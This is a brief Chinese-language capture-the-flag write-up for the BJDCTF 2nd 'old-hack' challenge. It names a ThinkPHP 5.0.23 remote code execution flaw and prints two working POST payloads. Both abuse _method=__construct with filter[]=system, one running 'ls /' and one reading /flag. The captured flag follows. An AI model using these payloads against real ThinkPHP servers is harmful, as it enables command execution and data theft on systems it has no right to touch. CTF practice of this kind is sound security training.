[BJDCTF 2nd]old-hack
[BJDCTF 2nd]old-hack
告诉了我们是THINKPHP5的漏洞
搜这个版本的漏洞
发现是thinkphp5.0.23的命令执行
THINKPHP 5.0.X-5.0.23、5.1.X、5.2.X 全版本远程代码执行漏洞分析
ThinkPHP 5.0.0~5.0.23 RCE 漏洞分析
直接用payload
_method=__construct&filter[]=system&server[REQUEST_METHOD]=ls /
_method=__construct&filter[]=system&server[REQUEST_METHOD]=cat /flag
flag{1613c541-43a2-4e99-88e8-7f739d9baba8}